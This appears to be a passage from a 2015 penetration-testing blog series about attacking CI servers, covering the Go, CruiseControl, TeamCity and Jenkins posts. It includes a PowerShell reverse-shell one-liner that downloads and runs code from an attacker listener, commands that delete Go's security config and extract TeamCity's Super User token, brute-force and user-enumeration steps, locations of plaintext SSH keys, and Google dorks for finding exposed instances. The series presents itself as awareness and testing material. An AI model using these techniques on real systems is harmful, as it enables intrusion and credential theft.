<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUUY7wnb1QLIgLZbXBm8btVTwaboiiYOhUwXsiPlEiub1DkSG7Pl_nBWVNGxoCkneIfnN3_Gd9VmILmeoJsBHxg9ePpUg2SuxxG7FW94by6zhUoUxYNNSYLSTeukGKBqIIQ0yl49N6VOU/s1600/Go_Reverse_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUUY7wnb1QLIgLZbXBm8btVTwaboiiYOhUwXsiPlEiub1DkSG7Pl_nBWVNGxoCkneIfnN3_Gd9VmILmeoJsBHxg9ePpUg2SuxxG7FW94by6zhUoUxYNNSYLSTeukGKBqIIQ0yl49N6VOU/s400/Go_Reverse_shell.png" width="400" /></a></div>
Great! We got an ICMP reverse shell!<br />
<br />
Now, if we have the ability to add/edit jobs on master. We can execute some more interesting attacks. Here we must note that Go does not have an agent on master and it doesn't even come in the same installation bundle. But for some reasons, people just love to run an agent on the master computer. <br />
<br />
<h4>
Removing Security</h4>
If we have the ability to add/edit jobs on master, we can remove all the security from a Go Server. We must either remove the file cruise-config.xml from the config directory in Go installation directory or remove the <security></security> part of it or we can add the current user to <admins> in the <security> part of cruise-config.xml. The Go Server service must be restarted after that. Now, anyone with the url will have administrative rights on the Go Server.</security></admins><br />
<br />
<admins><security>Below commands could be used to remove security from a Go Server (deletes cruise-config.xml and restarts the Go Server service)</security></admins><br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">cmd /c powershell -c del 'C:\Program Files (x86)\Go Server\config\cruise-config.xml'
cmd /c powershell –c Restart-Service 'Go Server'
</textarea></pre>
<h4 style="text-align: left;">
Credentials storage in cleartext</h4>
<div style="text-align: justify;">
SSH
keys are stored in cleartext on the disk. A user with ability to
configure jobs on master can read the keys. Location of SSH keys is:<br />
C:/Program Files (x86)/Go Server/%HOMEDRIVE%%HOMEPATH%/.ssh on Windows<br />
/var/go/.ssh on Linux</div>
<div style="text-align: justify;">
<br /></div>
Another interesting security issue is that to create users Go allows to use a file base authentication. Read the <a href="http://www.go.cd/documentation/user/current/configuration/dev_authentication.html">documentation here</a>.
The password in such a file is a base64 encoded SHA-1 with no salt. It
is not hard to compute the password in cleartext once we have access to
that file specially when Go doesn't enforce any password complexity. We
can get to know if File based authentication is being used by looking
for "passwordFile path" in the cruise-config.xml<br />
<br />
<h4>
CruiseControl</h4>
CruiseControl used to be very widely used with separate forks for .Net and Ruby. You can get it from <a href="http://cruisecontrol.sourceforge.net/download.html">here</a>. We will have only a very quick look at CruiseControl as it is an old software but still there are public instances and I spot it regularly in internal pen tests. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFJ_8iKJgueY0QlppmA07Fg3kgP0vx9Pnb6OMpF53CtN9pEAgb-kmfwZsCH3cMaKF8lPXBhKYQHUHBayEiG3XWzxKw9eypp2IMZUWVPPG7_s0QvomGk1yeiaaKu-UmtM0_je3ThxVRHGA/s1600/cruisecontrol_whoami.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFJ_8iKJgueY0QlppmA07Fg3kgP0vx9Pnb6OMpF53CtN9pEAgb-kmfwZsCH3cMaKF8lPXBhKYQHUHBayEiG3XWzxKw9eypp2IMZUWVPPG7_s0QvomGk1yeiaaKu-UmtM0_je3ThxVRHGA/s400/cruisecontrol_whoami.png" width="400" /></a></div>
It has no authentication by default. Commands could be executed by adding an “exec” builder in the Schedule category. Make sure to check out the /dashboard and /cruisecontrol on a CruiseControl instance.<br />
<br />
<h4>
Google Dorks</h4>
Following Google Dorks could be used to find public instances (too few) of Go<br />
Public instances: intitle:"Go - Login" inurl:go/auth/<br />
Public instances with no authentication: intitle:"Administration - Go" inurl:/go/admin<br />
Public instances of CruiseControl: intitle:"CruiseControl - Dashboard"<br />
<br />
<h4>
The Unserialize vulnerability</h4>
A fix was released for Go on November 9th, 2015: <a href="http://www.go.cd/2015/11/09/deserialization-vulnerability-commons-collections.html">http://www.go.cd/2015/11/09/deserialization-vulnerability-commons-collections.html</a><br />
<br />
CruiseControl also uses the Commons-Collections library but I was not interested in looking at it in detail.<br />
<div style="text-align: justify;">
<br />
<br />
To support my research, join me for a two days training "PowerShell for
Penetration Testers" at:</div>
<div style="text-align: left;">
<br />
<b>BlackHat, Asia (March 29-30th, 2016)</b> - <a href="https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html">https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html</a></div>
<div style="text-align: justify;">
<br />
<div style="text-align: left;">
<b>HITB, Amsterdam (May 24-25th, 2016)</b> - <a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a> </div>
</div>
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-62213758067992800172015-12-01T20:15:00.000+05:302018-01-14T22:48:14.973+05:30Week of Continuous Intrusion Tools - Day 2 - TeamCity<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to the Day 2 of the Week of Continuous Intrusion Tools. I am doing a series of posts which explore the attack surface of CI Tools.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To read posts of other days refer the table below:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson) (<a href="http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 2 - TeamCity</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html">Click Here</a>)</div>
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html">Click Here</a>)<br />
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Day 2 is dedicated to TeamCity. It can be found <a href="https://www.jetbrains.com/teamcity/download/">here</a>. Some of the security issues with TeamCity are:</div>
<ul style="text-align: left;">
<li>Registration of new users is enabled by default. Registered user gets Project Developer privileges.</li>
<li>No password complexity/policy for user passwords.</li>
<li>Runs with SYSTEM or high privilege user on Windows (most configs settle with an admin account). </li>
<li>Guest login could be enabled. In fact, so many public instances has it enabled. </li>
</ul>
<div style="text-align: justify;">
Also read <a href="https://confluence.jetbrains.com/pages/viewpage.action?pageId=54334889#HowTo...-TeamCitySecurityNotes">TeamCity Security Notes</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The information available with public instances of TeamCity is mind boggling! I saw web portal credentials, database credentials, hidden services and code repositories and much more on some public instances. We may not require compromising TeamCity to get access to intellectual property of an organization, much could be gathered from the instance. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But to access the Operating System and do more fun stuff we must have a Project Administrator privilege (non-admin). This user role has the capability of Adding/Editing build steps.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Fortunately, TeamCity has some protection against Brute Force attacks. It locks a user for one minute after five consecutive wrong login attempts within a minute. Also, it sends the password in encrypted form in transit. Still, since it does not enforce any password policy on user passwords, it is still possible with reasonable success to brute force it. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To enumerate users, we can either go through [TeamCityUrl]/viewLog.html?buildId=1 and iterate through it to look for user who triggered the build or a better way is to use its API and iterate through [TeamCityUrl]/app/rest/builds/id:1 and look for "user" tag. There are generally enough manually triggered builds to enumerate a good number of users. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1qauYm93W5iylCRuWmdVBTKCxIewdXby4zx4rU4_BykmdlUOcb3cFKLQSlp69jfLUoHNK5Yehe81fObl7mIVwlms4g1vXvi8KRe5tTbzWiCTbR6P5fqY8wXkBIfDg9lfVjDTCQzGeew/s1600/teamcity_enumerate_users.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1qauYm93W5iylCRuWmdVBTKCxIewdXby4zx4rU4_BykmdlUOcb3cFKLQSlp69jfLUoHNK5Yehe81fObl7mIVwlms4g1vXvi8KRe5tTbzWiCTbR6P5fqY8wXkBIfDg9lfVjDTCQzGeew/s400/teamcity_enumerate_users.png" width="400" /></a></div>
<div style="text-align: justify;">
After building a list of users, we can use the API to brute force credentials. TeamCity API allows access using Basic Auth :) We can use Burp Intruder to launch a brute force attack against TeamCity (or any other tool of choice). To use Intruder against Basic Auth see <a href="http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/">this tutorial</a>. Success looks like this:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyOObFPi_B-5Y3NpyBMDZbv1z5alqHB2kLx794g70y1_Hn8b628c4QxzbaDFXe4h6G9YZqX0vS5_VWlyDNC69KTIaqy85VGbM3qpATshhFsTFVCmphaOB7aUaelvML1p-X_Jw3qkjML68/s1600/teamcity_brute_force.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyOObFPi_B-5Y3NpyBMDZbv1z5alqHB2kLx794g70y1_Hn8b628c4QxzbaDFXe4h6G9YZqX0vS5_VWlyDNC69KTIaqy85VGbM3qpATshhFsTFVCmphaOB7aUaelvML1p-X_Jw3qkjML68/s400/teamcity_brute_force.png" width="400" /></a></div>
<div style="text-align: justify;">
Keep in mind that TeamCity blocks a user for one minute after five consecutive login attempts, using delay is advised. We should keep trying unless access to a Project Administrator is achieved. </div>
<div style="text-align: justify;">
<br /></div>
Having the privileges to Configure builds we can do interesting stuff.<br />
<br />
<h4 style="text-align: left;">
Executing Commands</h4>
<div style="text-align: justify;">
As a Project Administrator we can add Build Steps. A Build Step with PowerShell runner is an excellent choice on a Windows machine. (On *nix machines Shell commands and scripts could be executed)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJiX61pGFxj4l-jmjOyxOwkWFPt1uPG9TDcqq6BD7I2dJ1jGMw3E6dX-WKnjt9hWz79MhLes5xdv4XH0dy1DwJweGXhl6weQEIe3KWXaBUX060Cw9qKUFak1ziO5OC8f5KhrVJmqENX4g/s1600/TeamCity_whoami.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJiX61pGFxj4l-jmjOyxOwkWFPt1uPG9TDcqq6BD7I2dJ1jGMw3E6dX-WKnjt9hWz79MhLes5xdv4XH0dy1DwJweGXhl6weQEIe3KWXaBUX060Cw9qKUFak1ziO5OC8f5KhrVJmqENX4g/s400/TeamCity_whoami.png" width="400" /></a></div>
And when the Project is run:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrGzoGz3fYKBT92dmUt0LOSqaXcwU7t1NWwGqsit9uI07taiwXx_Ua1tckVFudrs_W26qWd2WkQaNor3css8m6OgpPQk3Cwchyphenhyphen0gUrhyphenhyphen1cUpLStVh_ztyBtHZuQC_z0cgD40zK0OFbph4/s1600/Teamcity_whoami_result.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrGzoGz3fYKBT92dmUt0LOSqaXcwU7t1NWwGqsit9uI07taiwXx_Ua1tckVFudrs_W26qWd2WkQaNor3css8m6OgpPQk3Cwchyphenhyphen0gUrhyphenhyphen1cUpLStVh_ztyBtHZuQC_z0cgD40zK0OFbph4/s320/Teamcity_whoami_result.png" width="320" /></a></div>
Sweet! We have SYSTEM privileges. <br />
<br /></div>
<div style="text-align: justify;">
Now, lets use some PowerShell hackery to improve the result of the above. In a restricted environment, we may have only limited options for a connect back. Lets use I<a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1">nvoke-PoshRatHttps.ps1 from Nishang</a>. Thanks to Casey, this shell makes a valid HTTPS connection between a target and a listener. Also, its client part is quite small and we just need to execute one line of PowerShell on the target. </div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object Net.WebClient).DownloadString("https://IPAddress:Port/connect")</textarea></pre>
<div style="text-align: justify;">
On the attacker's machine, just the Invoke-PoshRatHttps listener needs to be started. As soon as the build is triggered:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglt1393KlK9MswBhaSHMNmDNhzllDwHtt1DHenHuehBc7GoFvHhQI9GthTH-kCjHX40ZEU0uvZeYkkJ8GUiDYIgDTdQL2vXH9dGl4EMEYiuwWX8HBz5KtZuaxfLPD-0_e33dl17Ea8vAo/s1600/teamcity_reverse_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglt1393KlK9MswBhaSHMNmDNhzllDwHtt1DHenHuehBc7GoFvHhQI9GthTH-kCjHX40ZEU0uvZeYkkJ8GUiDYIgDTdQL2vXH9dGl4EMEYiuwWX8HBz5KtZuaxfLPD-0_e33dl17Ea8vAo/s400/teamcity_reverse_shell.png" width="400" /></a></div>
Awesome! Encrypted traffic between the attacker and the client. I don't stress using PowerShell for nothing :)<br />
<br />
Now, if we have the capability of configuring builds on master, few more interesting things can be done.<br />
<br />
<h4>
Super User</h4>
</div>
<div style="text-align: justify;">
TeamCity has a special user called Super User "which allows you to access the server UI with System Administrator permissions if you do not remember the credentials or need to fix authentication-related settings". Documentation about it is <a href="https://confluence.jetbrains.com/display/TCD9/Super+User">here</a>. To login as a Super User we must have the Super User authentication token which could be found in the teamcity-server.log file. In a default installation on Windows, the file is located in the C:\TeamCity\logs\ directory. Following simple PowerShell command could be used to read the token from a Windows master:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: white; color: black;">Select-String "Super User Authentication Token" C:\Teamcity\logs\teamcity-server.log</textarea></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Hky7SqEk_LX2y8d7rtGYtJbzB-S7MVB1flPc8MMRc8p6ICZIaOel94xJreBdxPEsNf2ENhFykWoEVyTCkkCiWJNpWZqnKvO0i5LpCpTq0dF8tjSZvk9Xcv5TcTKeXxadH6x840UlchU/s1600/TeamCity_SuperUser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Hky7SqEk_LX2y8d7rtGYtJbzB-S7MVB1flPc8MMRc8p6ICZIaOel94xJreBdxPEsNf2ENhFykWoEVyTCkkCiWJNpWZqnKvO0i5LpCpTq0dF8tjSZvk9Xcv5TcTKeXxadH6x840UlchU/s400/TeamCity_SuperUser.png" width="400" /></a></div>
After getting the token, it could either be used with a blank username at the TeamCity login page or at [TeamCityUrl]/login.html?super=1. This is how a Super User login looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBREqYdXBowQifuR8OMtcW0b6X07p0YID1xaiCxTCuOmb8P7r0Y9DPZ7TTRAsEtWnPf1DHSrB8SsErbItNiWxiDxZFCzPJKf1KhQnDc5pO3ikF5SL4T41DaE1J3r9I2vviOFTMd3ssUnI/s1600/TeamCity_SuperUser_Login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBREqYdXBowQifuR8OMtcW0b6X07p0YID1xaiCxTCuOmb8P7r0Y9DPZ7TTRAsEtWnPf1DHSrB8SsErbItNiWxiDxZFCzPJKf1KhQnDc5pO3ikF5SL4T41DaE1J3r9I2vviOFTMd3ssUnI/s400/TeamCity_SuperUser_Login.png" width="400" /></a></div>
Great! Interestingly, a Super User token is regenerated only when the TeamCity Server service is restarted. Also, there can be any number of Super User logins simultaneously. It means once you get access to a Super User token, it could provide a reasonable long access to the TeamCity instance.<br />
<br />
Fun Fact: We can lock out Super User for one minute by attempting to login with a blank username and password on TeamCity login page. Though I have not tried it, a Super User may be locked for longer duration by scripting the login attempts.<br />
<br />
<h4>
SSH Keys in clear</h4>
TeamCity allows users to upload SSH keys for projects. These keys, which are the private ones, are stored in clear on the master! Read the documentation <a href="https://confluence.jetbrains.com/display/TCD9/SSH+Keys+Management">here</a>.Whats worse is we can read the keys if we have the ability to configure builds on the master. The keys are stored in the [TeamCity Data Directory]\config\projects\[project]\pluginData\ssh_keys directory. We can get the Data Directory from the teamcity-server.log file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6O9vveDcsybOnxS05C-aKgSO6y-rpScwjBR2JFkE43B_3TeafVZs-yybuhzpbnjB5RRvzNzKYLgcqCwdUEnBzp93qbGkcWEI42jDAw16xUTMNjxdHag77eW9_eg2m0Ij_p_o1S70xnM/s1600/TeamCity_SSH.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6O9vveDcsybOnxS05C-aKgSO6y-rpScwjBR2JFkE43B_3TeafVZs-yybuhzpbnjB5RRvzNzKYLgcqCwdUEnBzp93qbGkcWEI42jDAw16xUTMNjxdHag77eW9_eg2m0Ij_p_o1S70xnM/s400/TeamCity_SSH.png" width="400" /></a></div>
Bingo! May I remind you that we are in 2015 :) <br />
<br />
<h4>
Google Dorks</h4>
Use the below Google Dorks to spot public instances of TeamCity:<br />
Instances with Guest login enabled: intitle:"Projects - TeamCity"<br />
Instances which allow Registration of new account: "intitle:Register a new account – TeamCity"<br />
<br />
TeamCity instances have very sensitive information. The below screenshots are just examples, there is a gold mine out there.<br />
<br />
In the below screenshot, the build log contained url of a product under development along with the credentials to access it with admin privileges.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibX4Z7ySZJ8gyLjKnqOnDxdFusEtJVKgPokI4Seo3nEq1ZFNV1rHamzUB99v8gKkLXL6FLxKGL4aBI5yJawZF6LOvwAilLFHtvX7qF6iiDFvkevkROAQLfTsufbtBUtWMF5ACian_TQys/s1600/TeamCity_BuildLog_Creds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibX4Z7ySZJ8gyLjKnqOnDxdFusEtJVKgPokI4Seo3nEq1ZFNV1rHamzUB99v8gKkLXL6FLxKGL4aBI5yJawZF6LOvwAilLFHtvX7qF6iiDFvkevkROAQLfTsufbtBUtWMF5ACian_TQys/s400/TeamCity_BuildLog_Creds.png" width="400" /></a></div>
The one below had credentials for the database administrator sa account password. The public IP address of the database was visible in another build log. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUwX7ayyHbwHCRKaMFgWDLwVvUXt8LLsYUDr5EDpjtyH7pMJTD2C1lRQ3DNyrFAi0t_LfeeBEAywx3j5SAX5NOs5dehwb4NNFU2i4vTu_Mez9lrrLwLOdSOleWlxBUrEfantdNPllv04/s1600/TeamCity_BuildLog_SQLCreds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUwX7ayyHbwHCRKaMFgWDLwVvUXt8LLsYUDr5EDpjtyH7pMJTD2C1lRQ3DNyrFAi0t_LfeeBEAywx3j5SAX5NOs5dehwb4NNFU2i4vTu_Mez9lrrLwLOdSOleWlxBUrEfantdNPllv04/s400/TeamCity_BuildLog_SQLCreds.png" width="400" /></a></div>
<br />
<h4>
Unserialization Vulnerability</h4>
As far as I know, TeamCity does not use the affected library.<br />
<br />
<h4>
Video Demonstration</h4>
A quick video demonstration of attacks discussed above:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/8tfBA2HTFRg/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/8tfBA2HTFRg?feature=player_embedded" width="320"></iframe></div>
</div>
<br />
Hope you enjoyed the post! Feedback and comments are welcome :)<br />
<br />
To support my research, join me for a two days training "<b>PowerShell for Penetration Testers</b>" at:<br />
<br />
<b>BlackHat, Asia (March 29-30th, 2016)</b> - https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html<br />
<br />
<b>HITB, Amsterdam (May 24-25th, 2016)</b> - http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/ <br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-66778448638473498112015-11-30T19:16:00.001+05:302018-01-14T22:48:15.025+05:30Week of Continuous Intrusion Tools - Day 1 - Jenkins<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Continuous Integration (CI) tools are used to frequently integrate commits by developers. Integration result in execution of builds and tests. CI tools are used by development, build management and source code management teams of many software/code development organizations. Read more about it <a href="http://www.martinfowler.com/articles/continuousIntegration.html">here</a>.<br />
<br />
CI tools support distributed builds. That is, in a typical setup, a CI tool master server has the ability to execute commands on a good number of machines where a build slave or agent is running. A simplified typical industry setup for Continuous Integration looks like s:</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG96bfuwdTqmE3n7Gn3v7QGEP60VtZcsbIiqMGXAM77_KbWg0oVUTg0Lmt6fbPEC6IzIKDrYJ-VlIeGFXR86WacXGvo4tvFmZNYVPgUXq3YvvvkgPZktpXm2rmuyC8FVAQMfTVI1pcl-4/s1600/ContinuousIntegration.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG96bfuwdTqmE3n7Gn3v7QGEP60VtZcsbIiqMGXAM77_KbWg0oVUTg0Lmt6fbPEC6IzIKDrYJ-VlIeGFXR86WacXGvo4tvFmZNYVPgUXq3YvvvkgPZktpXm2rmuyC8FVAQMfTVI1pcl-4/s400/ContinuousIntegration.png" width="400" /></a></div>
<br />
I got interested in CI tools when during a penetration test, I got access to one of the client's Jenkins instance available on the internet. It was trivial to compromise it and the access it provided amazed me. I blogged about it <a href="http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html">here</a>. <br />
<br />
As I began to actively look for and compromise CI Servers, I realized that they are widely used, lack basic security controls, often poorly configured yet hold immense importance because of the information (code repositories, build logs, credentials etc.) and machines (distributed builds) they have access to. If a hacker manages to get access to a CI tool, it provides access to, at least, the source code and command execution access to all the machines running slaves/agents.<br />
<br />
Still, what I found is an absolute disregard for security of CI tools, both by its users and developers. Even for instances over the internet, as we will see later on, many leave them running with default or improper configuration.<br />
<br />
To generate awareness about the security and attack surface of CI tools, I announce a <b>Week of Continuous Intrusion</b> beginning from 30th November, 2015. For the first three days we will discuss security issues in a CI tool (Jenkins and Hudson, TeamCity, Go and CruiseControl) and how its features and/or mis-configurations could be abused. On the fourth day, we will see a Common Abuse Set and how access to these tools could be used for Lateral movement and post exploitation. On the fifth day, we will discuss defense and other things.<br />
<br />
All the code and other materials could be found here: <a href="https://github.com/samratashok/ContinuousIntrusion">https://github.com/samratashok/ContinuousIntrusion</a><br />
<br />
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson)</div>
<div style="text-align: left;">
Day 2 - TeamCity (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html">Click Here</a>)</div>
<div style="text-align: justify;">
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)</div>
<br />
I hope that this Week of Continuous Intrusion will help System Administrators and Blue Teams to understand the attack surface of CI tools and defend against attacks. I wish Penetration Testers and Red Teams will use this to break into networks thus increasing the security of their clients. I also intend to people doing more extensive research on security of these tools. <br />
<br />
Lets begin with Day 1 - Jenkins.<br />
<br />
<h3>
Jenkins</h3>
Jenkins is the most widely used CI tool. You can download it from <a href="http://jenkins-ci.org/">here</a>. <a href="http://hudson-ci.org/">Hudson</a> has not been tested separately as both are quite similar. Whatever we are going to do with Jenkins should be applicable to Hudson as well. <br />
<br />
We can spot the following security issues in Jenkins: <br />
<ul>
<li>No authentication in the default installation.</li>
<li>No protection against brute force attacks.</li>
<li>No password complexity/policy for user passwords.</li>
<li>Runs with SYSTEM or high privilege user on Windows (never seen it running with non-admin privileges). </li>
<li>Prior to version 1.580, all users of Jenkins and console output of builds could be seen without authentication. Still, most Jenkins instances are configured the same way (Read privilege to Anonymous). </li>
</ul>
Documentation about securing Jenkins<a href="https://wiki.jenkins-ci.org/display/JENKINS/Securing+Jenkins"> is here</a>. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
For public instances of Jenkins, so much information could be collected there may be no need to actually compromise it. The information in build outputs is scary! I have seen database credentials, Git credentials, SSH keys etc. More about this in the Google Dorks section below.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
After configuring the recommended Matrix Based Security, to be able to play with the Operating System on which Jenkins is installed we must have access to a user who has privileges to Configure builds (a non-admin user). In most of the Jenkins instances, it is trivial to enumerate the users. Combine this with no protection against Brute Force attacks and no password policy and we can easily brute force credentials of users. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
User enumeration could be done by browsing to the following url (Anonymous with Read rights necessary): [JenkinsUrl]/asynchPeople/ </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
We can brute force Jenkins using Burp suite's Intruder or any similar tool. Catch a login request in Burp (POST request to [JenkinsUrl]/j_acegi_security_check) and send it to Intruder. Remember to remove the json parameter from the request. Also, we must go to Options and tell Intruder to follow redirections. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
In my experience, CI Tools user love to use their username as password. Therefore, first we will use the "pitchfork" attack type in Intruder to try to use username as password in the brute force requests. If that does not work, we will use the "Cluster Bomb" attack type. We will use usernames as payload 1 and a password list as payload 2. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tAQYYJQgepjY5w-c0j_RiW00hH8I5mB2UGIz93-tjZf4w1NFUY13fvvseM_tim4xgWUKl88Up_vcBP3i4YK0TNi5l-Q7JqILTHW20YFAxzOnQPyPwZ97axyNcRkiyJOzurh2mLeYMkw/s1600/Jenkins_bruteForce.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tAQYYJQgepjY5w-c0j_RiW00hH8I5mB2UGIz93-tjZf4w1NFUY13fvvseM_tim4xgWUKl88Up_vcBP3i4YK0TNi5l-Q7JqILTHW20YFAxzOnQPyPwZ97axyNcRkiyJOzurh2mLeYMkw/s400/Jenkins_bruteForce.png" width="400" /></a></div>
<div style="text-align: justify;">
And this is how success looks like:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsWGMNDm8-eWJuxNV1Ao7hSEDKs6yAu-WmhrQJYk7Fr4A127D4yloUoPOCgh6V5nV3ioZkgKb0JeiiL_kYgth3-jE0GDGOa6Jiaf2pPBYEBDwRS2JvCwaB-hV7opbo__uVjhj3iOuJhM/s1600/intruder.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsWGMNDm8-eWJuxNV1Ao7hSEDKs6yAu-WmhrQJYk7Fr4A127D4yloUoPOCgh6V5nV3ioZkgKb0JeiiL_kYgth3-jE0GDGOa6Jiaf2pPBYEBDwRS2JvCwaB-hV7opbo__uVjhj3iOuJhM/s400/intruder.png" width="400" /></a></div>
